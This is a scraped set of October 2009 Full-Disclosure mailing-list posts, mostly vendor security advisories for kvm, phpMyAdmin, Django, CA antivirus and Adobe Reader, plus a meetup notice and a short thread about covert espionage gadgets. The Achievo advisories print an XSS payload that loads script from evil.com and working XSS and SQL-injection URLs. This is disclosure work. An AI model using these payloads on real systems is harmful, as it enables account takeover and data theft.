[Full-disclosure] [SECURITY] [DSA 1907-1] New kvm packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1907-1 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano October 13, 2009 http://www.debian.org/security/faq - Package: kvm Vulnerability : several vulnerabilities Problem type : local (remote) Debian-specific: no Debian bugs: 509997 548975 CVE Ids: CVE-2008-5714 CVE-2009-3290 Several vulnerabilities have been discovered in kvm, a full virtualization system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-5714 Chris Webb discovered an off-by-one bug limiting KVM's VNC passwords to 7 characters. This flaw might make it easier for remote attackers to guess the VNC password, which is limited to seven characters where eight was intended. CVE-2009-3290 It was discovered that the kvm_emulate_hypercall function in KVM does not prevent access to MMU hypercalls from ring 0, which allows local guest OS users to cause a denial of service (guest kernel crash) and read or write guest kernel memory. For the stable distribution (lenny), these problems have been fixed in version 72+dfsg-5~lenny3. The oldstable distribution (etch) does not contain kvm. For the testing distribution (squeeze) these problems will be fixed soon. For the unstable distribution (sid) these problems have been fixed in version 85+dfsg-4.1 We recommend that you upgrade your kvm packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/kvm/kvm_72+dfsg-5~lenny3.dsc Size/MD5 checksum: 1349 da207d5f42ab45ed3956be5fcb6ad685 http://security.debian.org/pool/updates/main/k/kvm/kvm_72+dfsg-5~lenny3.diff.gz Size/MD5 checksum:41138 f28b640e60392636399873e99b6cc5e3 http://security.debian.org/pool/updates/main/k/kvm/kvm_72+dfsg.orig.tar.gz Size/MD5 checksum: 3250251 899a66ae2ea94e994e06f637e1afef4a Architecture independent packages: http://security.debian.org/pool/updates/main/k/kvm/kvm-source_72+dfsg-5~lenny3_all.deb Size/MD5 checksum: 158242 8cee5a68dadbbceecdac6330b69fa59f amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/k/kvm/kvm_72+dfsg-5~lenny3_amd64.deb Size/MD5 checksum: 1099546 5009415dc4927800b33249ca31d8a651 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/k/kvm/kvm_72+dfsg-5~lenny3_i386.deb Size/MD5 checksum: 1030530 313f1a0d91889bf167c4e1aaf57a027d These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkrUOqwACgkQ62zWxYk/rQcjBQCgy0TEZfRAPjYcv3t1xRIF02Kb HkYAoKZWJ1xHTUtj3ayq93yfada/Wlhj =Yfrb -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DEFCON London - DC4420 October 2009 Meet - This Thursday 15th
this month we have three great talks lined up, and, if Alien actually remembers to bring the shwag, we *will* have an auction for Hackers for Charity/EFF!!! talks are: y3d: stego in directories - Subere Evoting Machines - Glyn Eye in the sky. - Merlin time / date: 18:00 for 19:30 Thursday 15th October 2009 location: Sound Club 1 Leicester Square, London, WC2H 7NA Location Map: Sound Club, Leicester Square: http://maps.google.com/maps?f=qsource=s_qhl=engeocode=q=1+Leicester+Square,+London,+Westminster,+WC2H this is the NW corner of the square... if you stand facing the Empire Cinema/Casino, it's two doors to the left... confusion/faq: yes, it's a nightclub by name. no, there is no clubbing / loud music / scantily clad women / poles. no, there is no charge at the door - tell the bouncer you are there for dc4420 and they will let you in. tube: Leicester Square on the Piccadilly and Northern Lines. Piccadilly Circus on the Piccadilly and Bakerloo Lines. bus: Leicester Square Bus Map: http://www.tfl.gov.uk/tfl/gettingaround/maps/buses/pdf/leicestersquare-10899.pdf food : food is available at the venue - see the menu at: http://dc4420.org/files/soundclub/july_menu.jpg oh, and we beat them up about the beer prices (again) so hopefully we'll be able to afford more than 1/2 pint each this month... :P see you there! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:274 ] phpmyadmin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:274 http://www.mandriva.com/security/ ___ Package : phpmyadmin Date: October 13, 2009 Affected: Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: This is a security release for XSS and SQL injection problems. This upgrade provides phpmyadmin 2.11.9.6 for CS4 and 3.2.2.1 for MES5 which is not vulnerable for these security issues. ___ Updated Packages: Corporate 4.0: bc227ca845cd3019ad9ed38b58595e81 corporate/4.0/i586/phpMyAdmin-2.11.9.6-0.1.20060mlcs4.noarch.rpm be63b597c0de5b5b64b33db4f963e652 corporate/4.0/SRPMS/phpMyAdmin-2.11.9.6-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 38b583d1b359cfe275492bd16462d278 corporate/4.0/x86_64/phpMyAdmin-2.11.9.6-0.1.20060mlcs4.noarch.rpm be63b597c0de5b5b64b33db4f963e652 corporate/4.0/SRPMS/phpMyAdmin-2.11.9.6-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: e2be6765a2919121adf1c21f0f6faeeb mes5/i586/phpmyadmin-3.2.2.1-0.1mdvmes5.noarch.rpm 6c90b7dd5deca9ca46547b46533b3073 mes5/SRPMS/phpmyadmin-3.2.2.1-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: c3c136303e7dee66da310c81317062e8 mes5/x86_64/phpmyadmin-3.2.2.1-0.1mdvmes5.noarch.rpm 6c90b7dd5deca9ca46547b46533b3073 mes5/SRPMS/phpmyadmin-3.2.2.1-0.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFK1ESLmqjQ0CJFipgRAlf9AJ9RTsP63GL4+SRtybdCruN3PCqaGwCg5o6j VgD/SEOx3ZspZJJFzjlj7qs= =fc+7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cellphone with USB host
AFAIK, it's a field of one: http://www.hackerspace.net/hostilewrt A WRT-54GL with a LiPO battery will run for (at least) a week. The PCB inside fits in a long Kleenex box along with a battery underneath it and some real kleenex on top. Scatter a few around as needed. Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cellphone with USB host
Hi Valdis, I did a CSI NetSec preso on this and touched on the WRT54G, Nokia 770, Gumstix and (my personal favorite) PicoTux as good candidates for corporate espionage hijinks. Slides are here: http://www.slideshare.net/shawn_merdinger/csi-netsec-2006-poor-mans-guide-merdinger-1251099 Cheers, --scm On Sat, Oct 10, 2009 at 12:18 PM, valdis.kletni...@vt.edu wrote: So guys - what would be the ideal corporate-espionage device, and what's the best approximation currently on the market? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:275 ] python-django
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:275 http://www.mandriva.com/security/ ___ Package : python-django Date: October 13, 2009 Affected: 2008.1 ___ Problem Description: A vulnerability has been found and corrected in python-django: The Admin media handler in core/servers/basehttp.py in Django 1.0 and 0.96 does not properly map URL requests to expected static media files, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL (CVE-2009-2659). The versions of Django shipping with Mandriva Linux have been updated to the latest patched version that include the fix for this issue. In addition, they provide other bug fixes. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2659 http://www.djangoproject.com/weblog/2009/jul/28/security/ ___ Updated Packages: Mandriva Linux 2008.1: 7e02ae9683f4ec07c04c2c152c198544 2008.1/i586/python-django-0.96.5-0.1mdv2008.1.noarch.rpm 843fc269c83b1b8b25d5271452ea8921 2008.1/SRPMS/python-django-0.96.5-0.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 140afaf4950e387733c155d7b4a95e83 2008.1/x86_64/python-django-0.96.5-0.1mdv2008.1.noarch.rpm 843fc269c83b1b8b25d5271452ea8921 2008.1/SRPMS/python-django-0.96.5-0.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFK1GZFmqjQ0CJFipgRAvLZAKCsLArCBfQWNg49PMVhRMjwXYrY8QCfaLiJ z4zWcuV8t8s4K7IejZd3yhI= =ayyT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [G-SEC 46-2009] Computer Associates multiple products arbritary code execution
Computer Associates (CA) Anti-Virus Multiple products - arbitrary code execution Release mode : Coordinated Reference : [GSEC-46-2009] - Computer Associates multiple products RCE WWW : http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html Vendor: http://www.ca.com Status: Patched CVE : CVE-2009-3587 CVE-2009-3588 Credit: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 Discovered by : Thierry Zoller (G-SEC) Vendor reaction rating : near perfect* * Continous feedback on progress - CVE numbers - In depth investigation of the issues at hand Affected products : ~~~ CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1 CA Anti-Virus 2007 (v8) CA Anti-Virus 2008 CA Anti-Virus 2009 CA Anti-Virus Plus 2009 eTrust EZ Antivirus r7.1 CA Internet Security Suite 2007 (v3) CA Internet Security Suite 2008 CA Internet Security Suite Plus 2008 CA Internet Security Suite Plus 2009 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) 8.1 CA Threat Manager Total Defense CA Gateway Security r8.1 CA Protection Suites r2 CA Protection Suites r3 CA Protection Suites r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1 CA ARCserve Backup r11.5 on Windows CA ARCserve Backup r12 on Windows CA ARCserve Backup r12.0 SP1 on Windows CA ARCserve Backup r12.0 SP 2 on Windows CA ARCserve Backup r12.5 on Windows CA ARCserve Backup r11.1 Linux CA ARCserve Backup r11.5 Linux CA ARCserve for Windows Client Agent CA ARCserve for Windows Server component CA eTrust Intrusion Detection 2.0 SP1 CA eTrust Intrusion Detection 3.0 CA eTrust Intrusion Detection 3.0 SP1 CA Common Services (CCS) r3.1 CA Common Services (CCS) r11 CA Common Services (CCS) r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1 Affected Plattforms: ~~~ Windows UNIX Linux Solaris Mac OS X Netware Patch availability : Patches have been available since the 09.10.2009 - Please follow the steps listed here: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 I. Background ~ Quote: CA is one of the world's largest IT management software providers. We serve more than 99% of Fortune 1000 companies, as well as government entities, educational institutions and thousands of other companies in diverse industries worldwide CA Anti-Virus for the Enterprise is the next generation in comprehensive anti-virus security for business PCs, servers and PDAs. It combines proactive protection against malware with new, powerful management features that stop and remove malicious code before it enters your network, reducing system downtime II. Description ~~~ Improper handling of a specially crafted RAR archive file by the CA Anti-Virus engine arclib component leads to heap corruption and allows the attacker to cause a denial of service or possibly further compromise the system. Attacker has control over EBX : Basic Block: 6e4305b0 mov cl,byte ptr [ebx] Tainted Input Operands: ebx 6e4305b2 add edi,28h 6e4305b5 push edi 6e4305b6 lea edx,[esp+14h] 6e4305ba mov byte ptr [esp+14h],cl Tainted Input Operands: cl 6e4305be inc ebx Tainted Input Operands: ebx 6e4305bf push edx 6e4305c0 mov ecx,esi 6e4305c2 mov dword ptr [esp+1ch],ebx Tainted Input Operands: ebx 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0) III. Impact ~~~ The impact ranges from Denial of Service to potential remote arbitrary code execution. Due to the nature of Anti-virus products, the attack vectors can be near endless. An attack could be done over the way of an E-mail message carrying an RAR attachment (of a file recognised as being RAR), USB, CD, Network data etc. Please note that this is a general problem and not exclusive to Computer Associates. IV. Disclosure timeline ~ DD.MM. 11.05.2009 -
[Full-disclosure] [ MDVSA-2009:276 ] python-django
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:276 http://www.mandriva.com/security/ ___ Package : python-django Date: October 13, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in python-django: The Admin media handler in core/servers/basehttp.py in Django 1.0 and 0.96 does not properly map URL requests to expected static media files, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL (CVE-2009-2659). Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular expression (CVE-2009-3695). The versions of Django shipping with Mandriva Linux have been updated to the latest patched version that include the fix for this issue. In addition, they provide other bug fixes. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2659 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3695 http://www.djangoproject.com/weblog/2009/jul/28/security/ http://www.djangoproject.com/weblog/2009/oct/09/security/ ___ Updated Packages: Mandriva Linux 2009.0: eeb3f3a8fdbf4ae7e973c5b0ab95aee8 2009.0/i586/python-django-1.0.4-0.1mdv2009.0.noarch.rpm bd7dc74abdc388afe2743b180f8ae5a1 2009.0/SRPMS/python-django-1.0.4-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 9d5f9d82a19922ae82a33d60382f045f 2009.0/x86_64/python-django-1.0.4-0.1mdv2009.0.noarch.rpm bd7dc74abdc388afe2743b180f8ae5a1 2009.0/SRPMS/python-django-1.0.4-0.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 0027cec9a30e25f38fdb2fa68da6cf58 2009.1/i586/python-django-1.0.4-0.1mdv2009.1.noarch.rpm de002eb7492111f1ac473fd91de49165 2009.1/SRPMS/python-django-1.0.4-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 1d68b5b742e4618094cf651c95322b82 2009.1/x86_64/python-django-1.0.4-0.1mdv2009.1.noarch.rpm de002eb7492111f1ac473fd91de49165 2009.1/SRPMS/python-django-1.0.4-0.1mdv2009.1.src.rpm Mandriva Enterprise Server 5: 4f81003d7801b53640dc16939c510b0a mes5/i586/python-django-1.0.4-0.1mdvmes5.noarch.rpm 06d01833a4447328cf6ac6937cc1cc8a mes5/SRPMS/python-django-1.0.4-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: a0bb40c44b9d496aff726c527ecdce05 mes5/x86_64/python-django-1.0.4-0.1mdvmes5.noarch.rpm 06d01833a4447328cf6ac6937cc1cc8a mes5/SRPMS/python-django-1.0.4-0.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFK1IdymqjQ0CJFipgRApFnAJ4ngLB5xDe3wwK/EGVb5Sfg9Kx6mQCgyerP 5hQPDsCD7M33emustQbPahs= =p/CH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [BONSAI] XSS in Achievo - Customized XSS payload included
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
Multiple XSS in Achievo
1. *Advisory Information*
Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL:
http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733
3. *Software Description*
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].
4. *Vulnerability Description*
Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.
For additional information, please read [1].
5. *Vulnerable packages*
Version = 1.3.4
6. *Non-vulnerable packages*
Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/
7. *Credits*
This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).
8. *Technical Description*
8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'
variable within the scheduler module. This is because the application does not
properly sanitise the users input. The vulnerability can be triggered by a user
submitting the following data within the scheduler title:
SCRIPT SRC=//evil.com/xss.js/SCRIPT
Which will include the xss.js javascript file within the schedule. A javascript
that exploits this issue and creates a new administrator user in the system can
be found in Bonsai's blog [2].
8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the 'Organisation Contracts'
administration page. This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:
http://www.example.com/dispatch.php?atkprevlevel=0atkescape=atknodetype=organization.contractsatkaction=adminatksmartsearch=clearatkstartat=0atksearch[contractnumber]=;scriptalert('xss');/scriptatksearchmode[contractnumber]=substringatksearch[contractname]=scriptalert('xss');/scriptatksearchmode[contractname]=substringatksearch_AE_contracttype[contracttype][=atksearchmode[contracttype]=exactatksearch_AE_customer[customer]=scriptalert('xss');/scriptatksearchmode[customer]=substring
9. *Report Timeline*
- 2009-07-09:
Vulnerabilities were identified.
- 2009-08-08:
Vendor contacted.
- 2009-08-12:
Vendor confirmed vulnerabilities.
- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.
- 2009-10-12:
Vendor released fixed version.
- 2009-10-13:
The advisory BONSAI-2009-0101 is published.
10. *References*
[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
11. *About Bonsai*
Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [BONSAI] SQL Injection in Achievo
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
SQL Injection in Achievo
1. *Advisory Information*
Title: SQL Injection in Achievo
Advisory ID: BONSAI-2009-0102
Advisory URL:
http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release
2. *Vulnerability Information*
Class: SQL Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2734
3. *Software Description*
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].
4. *Vulnerability Description*
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input
is not strongly typed and thereby unexpectedly executed.
For additional information, please look at the references [1] and [2].
5. *Vulnerable packages*
Version = 1.3.4
6. *Non-vulnerable packages*
Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/
7. *Credits*
This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).
8. *Technical Description*
A SQL injection vulnerability was found in the dispatch.php script, more
specifically in the $user_id variable. The vulnerability can be triggered by
logging into Achievo and browsing to:
/dispatch.php?atknodetype=reports.weekreportatkaction=reportnameswitch=nameuserid=%27functionlevelswitch=allstartdate[day]=6startdate[month]=7startdate[year]=2009enddate[day]=17enddate[month]=7enddate[year]=2009showstatus=alloutputType=0atkorderby=period
Which will generate a syntax error in the database. The following is
the corresponding piece of code:
classweekreport.inc:128-134
function get_employee($user_id)
{
$db = atkGetDb();
$sql = SELECT * FROM person WHERE status='active' AND id='$user_id';
$record = $db-getrows($sql);
return $record[0];
}
9. *Report Timeline*
- 2009-07-09:
Vulnerabilities were identified.
- 2009-08-08:
Vendor contacted.
- 2009-08-12:
Vendor confirmed vulnerabilities.
- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.
- 2009-10-12:
Vendor released fixed version.
- 2009-10-13:
The advisory BONSAI-2009-0101 is published.
10. *References*
[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/SQL_injection
[2] http://en.wikipedia.org/wiki/SQL_injection
11. *About Bonsai*
Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.13.09: Adobe Acrobat and Reader U3D File Invalid Array Index Vulnerability
iDefense Security Advisory 10.13.09 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 13, 2009 I. BACKGROUND Adobe Acrobat Reader/Acrobat are programs for viewing and editing Portable Document Format (PDF) documents. For more information, see the vendor's site found at the following link. http://www.adobe.com/products/reader/ http://www.adobe.com/products/acrobatpro/ II. DESCRIPTION Remote exploitation of an invalid array index vulnerability in Adobe Systems Inc.'s Reader and Acrobat could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when parsing a U3D file embedded inside of a PDF. U3D is a file format used to represent 3D images. When parsing a U3D file, the parsing code fails to validate a value from the file used as index into a list of objects. This results in an attacker being able to specify an arbitrary value for a function pointer, which leads to the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. If the Adobe Reader browser plugin is enabled (this is the default setting), then this vulnerability can be exploited automatically by simply visiting a malicious webpage with an embedded PDF. If the browser plugin is disabled, an attacker needs to convince a user to open a malicious file. IV. DETECTION iDefense confirmed the existence of this vulnerability in Reader and Acrobat versions 9.1.3 and 8.1.6. Previous versions may also be affected. V. WORKAROUND A possible mitigation is to prevent Adobe Reader/Acrobat from opening files directly in the browser. If this functionality is disabled, then the user will have to open the file via the 'Open' button (or save it and open it later manually) if it is embedded in a webpage. Additionally, disabling JavaScript in Adobe Reader/Acrobat will make the vulnerability more difficult to exploit in a reliable fashion. VI. VENDOR RESPONSE Adobe has addressed this issue with an update. Further details and patches can be found at the following URL. http://www.adobe.com/support/security/bulletins/apsb09-15.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-2990 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/09/2009 Initial vendor notification 06/09/2009 Initial vendor response 10/13/2009 Coordinated Public disclosure IX. CREDIT This vulnerability was reported to iDefense by Dionysus Blazakis. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
